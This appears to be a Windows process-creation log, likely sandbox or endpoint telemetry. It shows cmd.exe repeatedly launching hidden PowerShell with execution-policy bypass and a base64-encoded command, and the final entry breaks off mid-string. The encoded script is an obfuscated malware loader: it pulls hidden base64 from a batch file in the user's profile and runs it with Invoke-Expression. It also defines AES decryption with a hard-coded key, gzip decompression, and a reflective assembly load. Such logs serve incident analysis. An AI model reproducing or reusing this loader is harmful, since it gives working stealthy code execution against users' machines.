Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGU